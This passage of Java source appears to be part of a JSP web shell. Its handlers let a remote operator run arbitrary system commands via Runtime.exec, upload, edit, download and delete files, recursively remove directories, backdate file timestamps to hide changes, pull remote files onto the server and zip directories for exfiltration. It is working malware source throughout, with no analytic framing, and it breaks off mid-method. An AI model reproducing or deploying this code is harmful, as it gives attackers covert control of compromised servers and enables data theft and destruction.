1890. ServerSocket s = (ServerSocket) obj;
1891. s.close();
1892. }
1893. Object online = JSession.getAttribute(SHELL_ONLINE);
1894. if (online != null)
1895. ((OnLineProcess) online).stop();
1896. JSession.invalidate();
1897. ((Invoker) ins.get("vLogin")).invoke(request, response,
1898. JSession);
1899. } catch (ClassCastException e) {
1900. JSession.invalidate();
1901. ((Invoker) ins.get("vLogin")).invoke(request, response,
1902. JSession);
1903. } catch (Exception e) {
1904.  
1905. throw e;
1906. }
1907. }
1908. }
1909.  
1910. private static class UploadInvoker extends DefaultInvoker {
1911. public boolean doBefore() {
1912. return false;
1913. }
1914.  
1915. public boolean doAfter() {
1916. return false;
1917. }
1918.  
1919. public void invoke(HttpServletRequest request,
1920. HttpServletResponse response, HttpSession JSession)
1921. throws Exception {
1922. try {
1923. UploadBean fileBean = new UploadBean();
1924. response.getWriter().println(
1925. JSession.getAttribute(CURRENT_DIR).toString());
1926. fileBean.setSavePath(JSession.getAttribute(CURRENT_DIR)
1927. .toString());
1928. fileBean.parseRequest(request);
1929. File f = new File(JSession.getAttribute(CURRENT_DIR) + "/"
1930. + fileBean.getFileName());
1931. if (f.exists() && f.length() > 0)
1932. JSession
1933. .setAttribute(MSG,
1934. "<span style='color:green'>Upload File Success!</span>");
1935. else
1936. JSession
1937. .setAttribute("MSG",
1938. "<span style='color:red'>Upload File Failed!</span>");
1939. response.sendRedirect(SHELL_NAME);
1940. } catch (Exception e) {
1941. throw e;
1942. }
1943. }
1944. }
1945.  
1946. private static class CopyInvoker extends DefaultInvoker {
1947. public void invoke(HttpServletRequest request,
1948. HttpServletResponse response, HttpSession JSession)
1949. throws Exception {
1950. try {
1951. String src = request.getParameter("src");
1952. String to = request.getParameter("to");
1953. InputStream in = null;
1954. Object enter = JSession.getAttribute(ENTER);
1955. if (enter == null)
1956. in = new FileInputStream(new File(src));
1957. else {
1958. ZipFile zf = new ZipFile((String) enter);
1959. ZipEntry entry = zf.getEntry(src);
1960. in = zf.getInputStream(entry);
1961. }
1962. BufferedInputStream input = new BufferedInputStream(in);
1963. BufferedOutputStream output = new BufferedOutputStream(
1964. new FileOutputStream(new File(to)));
1965. byte[] d = new byte[1024];
1966. int len = input.read(d);
1967. while (len != -1) {
1968. output.write(d, 0, len);
1969. len = input.read(d);
1970. }
1971. output.close();
1972. input.close();
1973. JSession.setAttribute(MSG, "Copy File Success!");
1974. response.sendRedirect(SHELL_NAME);
1975. } catch (Exception e) {
1976.  
1977. throw e;
1978. }
1979. }
1980. }
1981.  
1982. private static class BottomInvoker extends DefaultInvoker {
1983. public boolean doBefore() {
1984. return false;
1985. }
1986.  
1987. public boolean doAfter() {
1988. return false;
1989. }
1990.  
1991. public void invoke(HttpServletRequest request,
1992. HttpServletResponse response, HttpSession JSession)
1993. throws Exception {
1994. try {
1995. response
1996. .getWriter()
1997. .println(
1998. "<div style=\"padding:10px;border-bottom:1px solid #fff;border-top:1px solid #ddd;background:#eee;\">Don't break my heart~"
1999. + "</div>");
2000. } catch (Exception e) {
2001.  
2002. throw e;
2003. }
2004. }
2005. }
2006.  
2007. private static class VCreateFileInvoker extends DefaultInvoker {
2008. public void invoke(HttpServletRequest request,
2009. HttpServletResponse response, HttpSession JSession)
2010. throws Exception {
2011. try {
2012. PrintWriter out = response.getWriter();
2013. String path = request.getParameter("filepath");
2014. File f = new File(path);
2015. if (!f.isAbsolute()) {
2016. String oldPath = path;
2017. path = JSession.getAttribute(CURRENT_DIR).toString();
2018. if (!path.endsWith("/"))
2019. path += "/";
2020. path += oldPath;
2021. f = new File(path);
2022. f.createNewFile();
2023. } else {
2024. f.createNewFile();
2025. }
2026. out
2027. .println("<table width=\"100%\" border=\"0\" cellpadding=\"15\" cellspacing=\"0\"><tr><td>"
2028. + "<form name=\"form1\" id=\"form1\" action=\""
2029. + SHELL_NAME
2030. + "\" method=\"post\" >"
2031. + "<h2>Create / Edit File &raquo;</h2>"
2032. + "<input type='hidden' name='o' value='createFile'>"
2033. + "<p>Current File (import new file name and new file)<br /><input class=\"input\" name=\"filepath\" id=\"editfilename\" value=\""
2034. + path
2035. + "\" type=\"text\" size=\"100\" />"
2036. + " <select name='charset' class='input'><option value='ANSI'>ANSI</option><option value='UTF-8'>UTF-8</option></select></p>"
2037. + "<p>File Content<br /><textarea class=\"area\" id=\"filecontent\" name=\"filecontent\" cols=\"100\" rows=\"25\" ></textarea></p>"
2038. + "<p><input class=\"bt\" name=\"submit\" id=\"submit\" type=\"submit\" value=\"Submit\"> <input class=\"bt\" type=\"button\" value=\"Back\" onclick=\"history.back()\"></p>"
2039. + "</form>" + "</td></tr></table>");
2040. } catch (Exception e) {
2041.  
2042. throw e;
2043. }
2044. }
2045. }
2046.  
2047. private static class VEditInvoker extends DefaultInvoker {
2048. public void invoke(HttpServletRequest request,
2049. HttpServletResponse response, HttpSession JSession)
2050. throws Exception {
2051. try {
2052. PrintWriter out = response.getWriter();
2053. String path = request.getParameter("filepath");
2054. String charset = request.getParameter("charset");
2055. Object enter = JSession.getAttribute(ENTER);
2056. InputStream input = null;
2057. if (enter != null) {
2058. ZipFile zf = new ZipFile((String) enter);
2059. ZipEntry entry = new ZipEntry(path);
2060. input = zf.getInputStream(entry);
2061. } else {
2062. File f = new File(path);
2063. if (!f.exists())
2064. return;
2065. input = new FileInputStream(path);
2066. }
2067.  
2068. BufferedReader reader = null;
2069. if (Util.isEmpty(charset) || charset.equals("ANSI"))
2070. reader = new BufferedReader(new InputStreamReader(input));
2071. else
2072. reader = new BufferedReader(new InputStreamReader(input,
2073. charset));
2074. StringBuffer content = new StringBuffer();
2075. String s = reader.readLine();
2076. while (s != null) {
2077. content.append(s + "\r\n");
2078. s = reader.readLine();
2079. }
2080. reader.close();
2081. out
2082. .println("<table width=\"100%\" border=\"0\" cellpadding=\"15\" cellspacing=\"0\"><tr><td>"
2083. + "<form name=\"form1\" id=\"form1\" action=\""
2084. + SHELL_NAME
2085. + "\" method=\"post\" >"
2086. + "<h2>Create / Edit File &raquo;</h2>"
2087. + "<input type='hidden' name='o' value='createFile'>"
2088. + "<p>Current File (import new file name and new file)<br /><input class=\"input\" name=\"filepath\" id=\"editfilename\" value=\""
2089. + path
2090. + "\" type=\"text\" size=\"100\" />"
2091. + " <select name='charset' id='fcharset' onchange=\"new fso({path:'"
2092. + path
2093. + "',charset:document.getElementById('fcharset').value}).vEdit()\" class='input'><option value='ANSI'>ANSI</option><option "
2094. + ((!Util.isEmpty(charset) && charset
2095. .equals("UTF-8")) ? "selected" : "")
2096. + " value='UTF-8'>UTF-8</option></select></p>"
2097. + "<p>File Content<br /><textarea class=\"area\" id=\"filecontent\" name=\"filecontent\" cols=\"100\" rows=\"25\" >"
2098. + Util.htmlEncode(content.toString())
2099. + "</textarea></p>" + "<p>");
2100. if (enter != null)
2101. out
2102. .println("<input class=\"bt\" name=\"submit\" id=\"submit\" onclick=\"alert('You Are In File Now ! Can Not Save !')\" type=\"button\" value=\"Submit\">");
2103. else
2104. out
2105. .println("<input class=\"bt\" name=\"submit\" id=\"submit\" type=\"submit\" value=\"Submit\">");
2106. out
2107. .println("<input class=\"bt\" type=\"button\" value=\"Back\" onclick=\"history.back()\"></p>"
2108. + "</form>" + "</td></tr></table>");
2109.  
2110. } catch (Exception e) {
2111.  
2112. throw e;
2113. }
2114. }
2115. }
2116.  
2117. private static class CreateFileInvoker extends DefaultInvoker {
2118. public boolean doBefore() {
2119. return false;
2120. }
2121.  
2122. public boolean doAfter() {
2123. return false;
2124. }
2125.  
2126. public void invoke(HttpServletRequest request,
2127. HttpServletResponse response, HttpSession JSession)
2128. throws Exception {
2129. try {
2130. PrintWriter out = response.getWriter();
2131. String path = request.getParameter("filepath");
2132. String content = request.getParameter("filecontent");
2133. String charset = request.getParameter("charset");
2134. BufferedWriter outs = null;
2135. if (charset.equals("ANSI"))
2136. outs = new BufferedWriter(new FileWriter(new File(path)));
2137. else
2138. outs = new BufferedWriter(new OutputStreamWriter(
2139. new FileOutputStream(new File(path)), charset));
2140. outs.write(content, 0, content.length());
2141. outs.close();
2142. JSession
2143. .setAttribute(
2144. MSG,
2145. "Save File <span style='color:green'>"
2146. + (new File(path)).getName()
2147. + "</span> With <span style='font-weight:bold;color:red'>"
2148. + charset + "</span> Success!");
2149. response.sendRedirect(SHELL_NAME);
2150. } catch (Exception e) {
2151.  
2152. throw e;
2153. }
2154. }
2155. }
2156.  
2157. private static class VEditPropertyInvoker extends DefaultInvoker {
2158. public void invoke(HttpServletRequest request,
2159. HttpServletResponse response, HttpSession JSession)
2160. throws Exception {
2161. try {
2162. PrintWriter out = response.getWriter();
2163. String filepath = request.getParameter("filepath");
2164. File f = new File(filepath);
2165. if (!f.exists())
2166. return;
2167. String read = f.canRead() ? "checked=\"checked\"" : "";
2168. String write = f.canWrite() ? "checked=\"checked\"" : "";
2169. Calendar cal = Calendar.getInstance();
2170. cal.setTimeInMillis(f.lastModified());
2171.  
2172. out
2173. .println("<table width=\"100%\" border=\"0\" cellpadding=\"15\" cellspacing=\"0\"><tr><td>"
2174. + "<form name=\"form1\" id=\"form1\" action=\""
2175. + SHELL_NAME
2176. + "\" method=\"post\" >"
2177. + "<h2>Set File Property &raquo;</h2>"
2178. + "<p>Current File (FullPath)<br /><input class=\"input\" name=\"file\" id=\"file\" value=\""
2179. + request.getParameter("filepath")
2180. + "\" type=\"text\" size=\"120\" /></p>"
2181. + "<input type=\"hidden\" name=\"o\" value=\"editProperty\"> "
2182. + "<p>"
2183. + " <input type=\"checkbox\" disabled "
2184. + read
2185. + " name=\"read\" id=\"checkbox\">Read "
2186. + " <input type=\"checkbox\" disabled "
2187. + write
2188. + " name=\"write\" id=\"checkbox2\">Write "
2189. + "</p>"
2190. + "<p>Instead &raquo;"
2191. + "year:"
2192. + "<input class=\"input\" name=\"year\" value="
2193. + cal.get(Calendar.YEAR)
2194. + " id=\"year\" type=\"text\" size=\"4\" />"
2195. + "month:"
2196. + "<input class=\"input\" name=\"month\" value="
2197. + (cal.get(Calendar.MONTH) + 1)
2198. + " id=\"month\" type=\"text\" size=\"2\" />"
2199. + "day:"
2200. + "<input class=\"input\" name=\"date\" value="
2201. + cal.get(Calendar.DATE)
2202. + " id=\"date\" type=\"text\" size=\"2\" />"
2203. + ""
2204. + "hour:"
2205. + "<input class=\"input\" name=\"hour\" value="
2206. + cal.get(Calendar.HOUR)
2207. + " id=\"hour\" type=\"text\" size=\"2\" />"
2208. + "minute:"
2209. + "<input class=\"input\" name=\"minute\" value="
2210. + cal.get(Calendar.MINUTE)
2211. + " id=\"minute\" type=\"text\" size=\"2\" />"
2212. + "second:"
2213. + "<input class=\"input\" name=\"second\" value="
2214. + cal.get(Calendar.SECOND)
2215. + " id=\"second\" type=\"text\" size=\"2\" />"
2216. + "</p>"
2217. + "<p><input class=\"bt\" name=\"submit\" value=\"Submit\" id=\"submit\" type=\"submit\" value=\"Submit\"> <input class=\"bt\" name=\"submit\" value=\"Back\" id=\"submit\" type=\"button\" onclick=\"history.back()\"></p>"
2218. + "</form>" + "</td></tr></table>");
2219. } catch (Exception e) {
2220. throw e;
2221. }
2222. }
2223. }
2224.  
2225. private static class EditPropertyInvoker extends DefaultInvoker {
2226. public boolean doBefore() {
2227. return false;
2228. }
2229.  
2230. public boolean doAfter() {
2231. return false;
2232. }
2233.  
2234. public void invoke(HttpServletRequest request,
2235. HttpServletResponse response, HttpSession JSession)
2236. throws Exception {
2237. try {
2238. String f = request.getParameter("file");
2239. File file = new File(f);
2240. if (!file.exists())
2241. return;
2242.  
2243. String year = request.getParameter("year");
2244. String month = request.getParameter("month");
2245. String date = request.getParameter("date");
2246. String hour = request.getParameter("hour");
2247. String minute = request.getParameter("minute");
2248. String second = request.getParameter("second");
2249.  
2250. Calendar cal = Calendar.getInstance();
2251. cal.set(Calendar.YEAR, Integer.parseInt(year));
2252. cal.set(Calendar.MONTH, Integer.parseInt(month) - 1);
2253. cal.set(Calendar.DATE, Integer.parseInt(date));
2254. cal.set(Calendar.HOUR, Integer.parseInt(hour));
2255. cal.set(Calendar.MINUTE, Integer.parseInt(minute));
2256. cal.set(Calendar.SECOND, Integer.parseInt(second));
2257. if (file.setLastModified(cal.getTimeInMillis())) {
2258. JSession.setAttribute(MSG, "Reset File Property Success!");
2259. } else {
2260. JSession
2261. .setAttribute(MSG,
2262. "<span style='color:red'>Reset File Property Failed!</span>");
2263. }
2264. response.sendRedirect(SHELL_NAME);
2265. } catch (Exception e) {
2266.  
2267. throw e;
2268. }
2269. }
2270. }
2271.  
2272. //VShell
2273. private static class VsInvoker extends DefaultInvoker {
2274. public void invoke(HttpServletRequest request,
2275. HttpServletResponse response, HttpSession JSession)
2276. throws Exception {
2277. try {
2278. PrintWriter out = response.getWriter();
2279. String cmd = request.getParameter("command");
2280. String program = request.getParameter("program");
2281. if (cmd == null) {
2282. if (ISLINUX)
2283. cmd = "id";
2284. else
2285. cmd = "cmd.exe /c set";
2286. }
2287. if (program == null)
2288. program = "cmd.exe /c net start > " + SHELL_DIR
2289. + "/Log.txt";
2290. if (JSession.getAttribute(MSG) != null) {
2291. Util.outMsg(out, JSession.getAttribute(MSG).toString());
2292. JSession.removeAttribute(MSG);
2293. }
2294. out
2295. .println("<table width=\"100%\" border=\"0\" cellpadding=\"15\" cellspacing=\"0\"><tr><td>"
2296. + "<form name=\"form1\" id=\"form1\" action=\""
2297. + SHELL_NAME
2298. + "\" method=\"post\" >"
2299. + "<h2>Execute Program &raquo;</h2>"
2300. + "<p>"
2301. + "<input type=\"hidden\" name=\"o\" value=\"shell\">"
2302. + "<input type=\"hidden\" name=\"type\" value=\"program\">"
2303. + "Parameter<br /><input class=\"input\" name=\"program\" id=\"program\" value=\""
2304. + program
2305. + "\" type=\"text\" size=\"100\" />"
2306. + "<input class=\"bt\" name=\"submit\" id=\"submit\" value=\"Execute\" type=\"submit\" size=\"100\" />"
2307. + "</p>"
2308. + "</form>"
2309. + "<form name=\"form1\" id=\"form1\" action=\""
2310. + SHELL_NAME
2311. + "\" method=\"post\" >"
2312. + "<h2>Execute Shell &raquo;</h2>"
2313. + "<p>"
2314. + "<input type=\"hidden\" name=\"o\" value=\"shell\">"
2315. + "<input type=\"hidden\" name=\"type\" value=\"command\">"
2316. + "Parameter<br /><input class=\"input\" name=\"command\" id=\"command\" value=\""
2317. + cmd
2318. + "\" type=\"text\" size=\"100\" />"
2319. + "<input class=\"bt\" name=\"submit\" id=\"submit\" value=\"Execute\" type=\"submit\" size=\"100\" />"
2320. + "</p>"
2321. + "</form>"
2322. + "</td>"
2323. + "</tr></table>");
2324. } catch (Exception e) {
2325.  
2326. throw e;
2327. }
2328. }
2329. }
2330.  
2331. private static class ShellInvoker extends DefaultInvoker {
2332. public void invoke(HttpServletRequest request,
2333. HttpServletResponse response, HttpSession JSession)
2334. throws Exception {
2335. try {
2336. PrintWriter out = response.getWriter();
2337. String type = request.getParameter("type");
2338. if (type.equals("command")) {
2339. ((Invoker) ins.get("vs")).invoke(request, response,
2340. JSession);
2341. out.println("<div style='margin:10px'><hr/>");
2342. out.println("<pre>");
2343. String command = request.getParameter("command");
2344. if (!Util.isEmpty(command)) {
2345. Process pro = Runtime.getRuntime().exec(command);
2346. BufferedReader reader = new BufferedReader(
2347. new InputStreamReader(pro.getInputStream()));
2348. String s = reader.readLine();
2349. while (s != null) {
2350. out.println(Util.htmlEncode(Util.getStr(s)));
2351. s = reader.readLine();
2352. }
2353. reader.close();
2354. reader = new BufferedReader(new InputStreamReader(pro
2355. .getErrorStream()));
2356. s = reader.readLine();
2357. while (s != null) {
2358. out.println(Util.htmlEncode(Util.getStr(s)));
2359. s = reader.readLine();
2360. }
2361. reader.close();
2362. out.println("</pre></div>");
2363. }
2364. } else {
2365. String program = request.getParameter("program");
2366. if (!Util.isEmpty(program)) {
2367. Process pro = Runtime.getRuntime().exec(program);
2368. JSession.setAttribute(MSG, "Program Has Run Success!");
2369. ((Invoker) ins.get("vs")).invoke(request, response,
2370. JSession);
2371. }
2372. }
2373. } catch (Exception e) {
2374.  
2375. throw e;
2376. }
2377. }
2378. }
2379.  
2380. private static class DownInvoker extends DefaultInvoker {
2381. public boolean doBefore() {
2382. return false;
2383. }
2384.  
2385. public boolean doAfter() {
2386. return false;
2387. }
2388.  
2389. public void invoke(HttpServletRequest request,
2390. HttpServletResponse response, HttpSession JSession)
2391. throws Exception {
2392. try {
2393. String path = request.getParameter("path");
2394. if (Util.isEmpty(path))
2395. return;
2396. InputStream i = null;
2397. Object enter = JSession.getAttribute(ENTER);
2398. String fileName = null;
2399. if (enter == null) {
2400. File f = new File(path);
2401. if (!f.exists())
2402. return;
2403. fileName = f.getName();
2404. i = new FileInputStream(f);
2405. } else {
2406. ZipFile zf = new ZipFile((String) enter);
2407. ZipEntry entry = new ZipEntry(path);
2408. fileName = entry.getName().substring(
2409. entry.getName().lastIndexOf("/") + 1);
2410. i = zf.getInputStream(entry);
2411. }
2412. response.setHeader("Content-Disposition",
2413. "attachment;filename="
2414. + URLEncoder.encode(fileName, PAGE_CHARSET));
2415. BufferedInputStream input = new BufferedInputStream(i);
2416. BufferedOutputStream output = new BufferedOutputStream(response
2417. .getOutputStream());
2418. byte[] data = new byte[1024];
2419. int len = input.read(data);
2420. while (len != -1) {
2421. output.write(data, 0, len);
2422. len = input.read(data);
2423. }
2424. input.close();
2425. output.close();
2426. } catch (Exception e) {
2427.  
2428. throw e;
2429. }
2430. }
2431. }
2432.  
2433. //VDown
2434. private static class VdInvoker extends DefaultInvoker {
2435. public void invoke(HttpServletRequest request,
2436. HttpServletResponse response, HttpSession JSession)
2437. throws Exception {
2438. try {
2439. PrintWriter out = response.getWriter();
2440. String savepath = request.getParameter("savepath");
2441. String url = request.getParameter("url");
2442. if (Util.isEmpty(url))
2443. url = "http://www.baidu.com/";
2444. if (Util.isEmpty(savepath)) {
2445. savepath = JSession.getAttribute(CURRENT_DIR).toString();
2446. }
2447. if (!Util.isEmpty(JSession.getAttribute("done"))) {
2448. Util.outMsg(out, "Download Remote File Success!");
2449. JSession.removeAttribute("done");
2450. }
2451. out
2452. .println("<table width=\"100%\" border=\"0\" cellpadding=\"15\" cellspacing=\"0\"><tr><td>"
2453. + "<form name=\"form1\" id=\"form1\" action=\""
2454. + SHELL_NAME
2455. + "\" method=\"post\" >"
2456. + "<h2>Remote File DownLoad &raquo;</h2>"
2457. + "<p>"
2458. + "<input type=\"hidden\" name=\"o\" value=\"downRemote\">"
2459. + "<p>File&nbsp;&nbsp;&nbsp;URL: "
2460. + " <input class=\"input\" name=\"url\" value=\""
2461. + url
2462. + "\" id=\"url\" type=\"text\" size=\"200\" /></p>"
2463. + "<p>Save Path: "
2464. + "<input class=\"input\" name=\"savepath\" id=\"savepath\" value=\""
2465. + savepath
2466. + "\" type=\"text\" size=\"200\" /></p>"
2467. + "<input class=\"bt\" name=\"connect\" id=\"connect\" value=\"DownLoad\" type=\"submit\" size=\"100\" />"
2468. + "</p>" + "</form></table>");
2469. } catch (Exception e) {
2470.  
2471. throw e;
2472. }
2473. }
2474. }
2475.  
2476. private static class DownRemoteInvoker extends DefaultInvoker {
2477. public boolean doBefore() {
2478. return true;
2479. }
2480.  
2481. public boolean doAfter() {
2482. return true;
2483. }
2484.  
2485. public void invoke(HttpServletRequest request,
2486. HttpServletResponse response, HttpSession JSession)
2487. throws Exception {
2488. try {
2489. String downFileUrl = request.getParameter("url");
2490. String savePath = request.getParameter("savepath");
2491. if (Util.isEmpty(downFileUrl) || Util.isEmpty(savePath))
2492. return;
2493. URL downUrl = new URL(downFileUrl);
2494. URLConnection conn = downUrl.openConnection();
2495.  
2496. File tempF = new File(savePath);
2497. File saveF = tempF;
2498. if (tempF.isDirectory()) {
2499. String fName = downFileUrl.substring(downFileUrl
2500. .lastIndexOf("/") + 1);
2501. saveF = new File(tempF, fName);
2502. }
2503. BufferedInputStream in = new BufferedInputStream(conn
2504. .getInputStream());
2505. BufferedOutputStream out = new BufferedOutputStream(
2506. new FileOutputStream(saveF));
2507. byte[] data = new byte[1024];
2508. int len = in.read(data);
2509. while (len != -1) {
2510. out.write(data, 0, len);
2511. len = in.read(data);
2512. }
2513. in.close();
2514. out.close();
2515. JSession.setAttribute("done", "d");
2516. ((Invoker) ins.get("vd")).invoke(request, response, JSession);
2517. } catch (Exception e) {
2518.  
2519. throw e;
2520. }
2521. }
2522. }
2523.  
2524. private static class IndexInvoker extends DefaultInvoker {
2525. public void invoke(HttpServletRequest request,
2526. HttpServletResponse response, HttpSession JSession)
2527. throws Exception {
2528. try {
2529. ((Invoker) ins.get("filelist")).invoke(request, response,
2530. JSession);
2531. } catch (Exception e) {
2532.  
2533. throw e;
2534. }
2535. }
2536. }
2537.  
2538. private static class MkDirInvoker extends DefaultInvoker {
2539. public boolean doBefore() {
2540. return false;
2541. }
2542.  
2543. public boolean doAfter() {
2544. return false;
2545. }
2546.  
2547. public void invoke(HttpServletRequest request,
2548. HttpServletResponse response, HttpSession JSession)
2549. throws Exception {
2550. try {
2551. String name = request.getParameter("name");
2552. File f = new File(name);
2553. if (!f.isAbsolute()) {
2554. String path = JSession.getAttribute(CURRENT_DIR).toString();
2555. if (!path.endsWith("/"))
2556. path += "/";
2557. path += name;
2558. f = new File(path);
2559. }
2560. f.mkdirs();
2561. JSession.setAttribute(MSG, "Make Directory Success!");
2562. response.sendRedirect(SHELL_NAME);
2563. } catch (Exception e) {
2564.  
2565. throw e;
2566. }
2567. }
2568. }
2569.  
2570. private static class MoveInvoker extends DefaultInvoker {
2571. public boolean doBefore() {
2572. return false;
2573. }
2574.  
2575. public boolean doAfter() {
2576. return false;
2577. }
2578.  
2579. public void invoke(HttpServletRequest request,
2580. HttpServletResponse response, HttpSession JSession)
2581. throws Exception {
2582. try {
2583. PrintWriter out = response.getWriter();
2584. String src = request.getParameter("src");
2585. String target = request.getParameter("to");
2586. if (!Util.isEmpty(target) && !Util.isEmpty(src)) {
2587. File file = new File(src);
2588. if (file.renameTo(new File(target))) {
2589. JSession.setAttribute(MSG, "Move File Success!");
2590. } else {
2591. String msg = "Move File Failed!";
2592. if (file.isDirectory()) {
2593. msg += "The Move Will Failed When The Directory Is Not Empty.";
2594. }
2595. JSession.setAttribute(MSG, msg);
2596. }
2597. response.sendRedirect(SHELL_NAME);
2598. }
2599. } catch (Exception e) {
2600.  
2601. throw e;
2602. }
2603. }
2604. }
2605.  
2606. private static class RemoveDirInvoker extends DefaultInvoker {
2607. public boolean doBefore() {
2608. return false;
2609. }
2610.  
2611. public boolean doAfter() {
2612. return false;
2613. }
2614.  
2615. public void invoke(HttpServletRequest request,
2616. HttpServletResponse response, HttpSession JSession)
2617. throws Exception {
2618. try {
2619. String dir = request.getParameter("dir");
2620. File file = new File(dir);
2621. if (file.exists()) {
2622. deleteFile(file);
2623. deleteDir(file);
2624. }
2625.  
2626. JSession.setAttribute(MSG, "Remove Directory Success!");
2627. response.sendRedirect(SHELL_NAME);
2628. } catch (Exception e) {
2629.  
2630. throw e;
2631. }
2632. }
2633.  
2634. public void deleteFile(File f) {
2635. if (f.isFile()) {
2636. f.delete();
2637. } else {
2638. File[] list = f.listFiles();
2639. for (int i = 0; i < list.length; i++) {
2640. File ff = list[i];
2641. deleteFile(ff);
2642. }
2643. }
2644. }
2645.  
2646. public void deleteDir(File f) {
2647. File[] list = f.listFiles();
2648. if (list.length == 0) {
2649. f.delete();
2650. } else {
2651. for (int i = 0; i < list.length; i++) {
2652. File ff = list[i];
2653. deleteDir(ff);
2654. }
2655. deleteDir(f);
2656. }
2657. }
2658. }
2659.  
2660. private static class PackBatchInvoker extends DefaultInvoker {
2661. public boolean doBefore() {
2662. return false;
2663. }
2664.  
2665. public boolean doAfter() {
2666. return false;
2667. }
2668.  
2669. public void invoke(HttpServletRequest request,
2670. HttpServletResponse response, HttpSession JSession)
2671. throws Exception {
2672. try {
2673. String files = request.getParameter("files");
2674. if (Util.isEmpty(files))
2675. return;
2676. String saveFileName = request.getParameter("savefilename");
2677. File saveF = new File(JSession.getAttribute(CURRENT_DIR)
2678. .toString(), saveFileName);
2679. if (saveF.exists()) {
2680. JSession.setAttribute(MSG, "The File \"" + saveFileName
2681. + "\" Has Been Exists!");
2682. response.sendRedirect(SHELL_NAME);
2683. return;
2684. }
2685. ZipOutputStream zout = new ZipOutputStream(
2686. new BufferedOutputStream(new FileOutputStream(saveF)));
2687. String[] arr = files.split(",");
2688. for (int i = 0; i < arr.length; i++) {
2689. String f = arr[i];
2690. File pF = new File(JSession.getAttribute(CURRENT_DIR)
2691. .toString(), f);
2692. ZipEntry entry = new ZipEntry(pF.getName());
2693. zout.putNextEntry(entry);
2694. FileInputStream fInput = new FileInputStream(pF);
2695. int len = 0;
2696. byte[] buf = new byte[1024];
2697. while ((len = fInput.read(buf)) != -1) {
2698. zout.write(buf, 0, len);
2699. zout.flush();
2700. }
2701. fInput.close();
2702. }
2703. zout.close();
2704. JSession.setAttribute(MSG, "Pack Files Success!");
2705. response.sendRedirect(SHELL_NAME);
2706. } catch (Exception e) {
2707.  
2708. throw e;
2709. }
2710. }
2711. }
2712.  
2713. private static class VPackConfigInvoker extends DefaultInvoker {
2714. public void invoke(HttpServletRequest request,
2715. HttpServletResponse response, HttpSession JSession)
2716. throws Exception {
2717. try {
2718. PrintWriter out = response.getWriter();
2719. String packfile = request.getParameter("packedfile");
2720. String currentd = JSession.getAttribute(CURRENT_DIR).toString();
2721. out
2722. .println("<form action='"
2723. + SHELL_NAME
2724. + "' method='post'>"
2725. + "<input type='hidden' name='o' value='pack'/>"
2726. + "<input type='hidden' name='config' value='true'/>"
2727. + "<table width=\"100%\" border=\"0\" cellpadding=\"15\" cellspacing=\"0\">"
2728. + " <tr>"
2729. + " <td><h2 id=\"Bin_H2_Title\">Pack Configuration &gt;&gt;<hr/></h2>"
2730. + " <div id=\"hOWTm\">"
2731. + " <table width=\"100%\" border=\"0\" cellpadding=\"4\" cellspacing=\"0\" style=\"margin:10px 0;\">"
2732. + " <tr align=\"center\">"
2733. + " <td style=\"width:5%\"></td>"
2734. + " <td align=\"center\"><table border=\"0\">"
2735. + " <tr>"
2736. + " <td>Packed Dir</td>"
2737. + " <td><input type=\"text\" name=\"packedfile\" size='100' value=\""
2738. + packfile
2739. + "\" class=\"input\"/></td>"
2740. + " </tr>"
2741. + " <tr>"
2742. + " <td>Save To</td>"
2743. + " <td><input type=\"text\" name=\"savefilename\" size='100' value=\""
2744. + ((currentd.endsWith("/") ? currentd
2745. : currentd + "/") + "pack.zip")
2746. + "\" class=\"input\"/></td>"
2747. + " </tr>"
2748. + " <tr>"
2749. + " <td colspan=\"2\"><fieldset><legend>Ext Filter</legend>"
2750. + " <input type='radio' name='extfilter' value='no'/>no <input checked type='radio' name='extfilter' value='blacklist'/>Blacklist <input type='radio' name='extfilter' value='whitelist'/>Whitelist"
2751. + " <hr/><input type='text' class='input' size='100' value='mp3,wmv,rm,rmvb,avi' name='fileext'/>"
2752. + " </fieldset></td>"
2753. + " </tr>"
2754. + " <tr>"
2755. + " <td>Filesize Filter</td>"
2756. + " <td><input type=\"text\" name=\"filesize\" value=\"0\" class=\"input\"/>(KB) "
2757. + " <input type='radio' name='sizefilter' value='no' checked>no <input type='radio' name='sizefilter' value='greaterthan'>greaterthan<input type='radio' name='sizefilter' value='lessthan'>lessthan</td>"
2758. + " </tr>"
2759. + " <tr>"
2760. + " <td>Exclude Dir</td>"
2761. + " <td><input type=\"text\" name=\"exclude\" size='100' class=\"input\"/></td>"
2762. + " </tr>"
2763. + " </table></td>"
2764. + " </tr>"
2765. + " <tr align=\"center\">"
2766. + " <td colspan=\"2\">"
2767. + " <input type=\"submit\" name=\"FJE\" value=\"Pack\" id=\"FJE\" class=\"bt\" />"
2768. + " </td>" + " </tr>"
2769. + " </table>" + " </div></td>"
2770. + " </tr>" + " </table></form>");
2771. } catch (Exception e) {
2772.  
2773. throw e;
2774. }
2775. }
2776. }
2777.  
2778. private static class PackInvoker extends DefaultInvoker {
2779. public boolean doBefore() {
2780. return false;
2781. }
2782.  
2783. public boolean doAfter() {
2784. return false;
2785. }
2786.  
2787. private boolean config = false;
2788. private String extFilter = "blacklist";
2789. private String[] fileExts = null;
2790. private String sizeFilter = "no";
2791. private int filesize = 0;
2792. private String[] exclude = null;
2793. private String packFile = null;
2794.  
2795. private void reset() {
2796. this.config = false;
2797. this.extFilter = "blacklist";
2798. this.fileExts = null;
2799. this.sizeFilter = "no";
2800. this.filesize = 0;
2801. this.exclude = null;
2802. this.packFile = null;
2803. }
2804.  
2805. public void invoke(HttpServletRequest request,
2806. HttpServletResponse response, HttpSession JSession)
2807. throws Exception {
2808. try {
2809. String config = request.getParameter("config");
2810. if (!Util.isEmpty(config) && config.equals("true")) {
2811. this.config = true;
2812. this.extFilter = request.getParameter("extfilter");
2813. this.fileExts = request.getParameter("fileext").split(",");
2814. this.sizeFilter = request.getParameter("sizefilter");
2815. this.filesize = Integer.parseInt(request
2816. .getParameter("filesize"));
2817. this.exclude = request.getParameter("exclude").split(",");
2818. }
2819. String packedFile = request.getParameter("packedfile");
2820. if (Util.isEmpty(packedFile))
2821. return;
2822. this.packFile = packedFile;
2823. String saveFileName = request.getParameter("savefilename");
2824. File saveF = null;
2825. if (this.config)
2826. saveF = new File(saveFileName);
2827. else
2828. saveF = new File(JSession.getAttribute(CURRENT_DIR)
2829. .toString(), saveFileName);
2830. if (saveF.exists()) {
2831. JSession.setAttribute(MSG, "The File \"" + saveFileName
2832. + "\" Has Been Exists!");
2833. response.sendRedirect(SHELL_NAME);
2834. return;
2835. }
2836. File pF = new File(packedFile);
2837. ZipOutputStream zout = null;
2838. String base = "";
2839. if (pF.isDirectory()) {
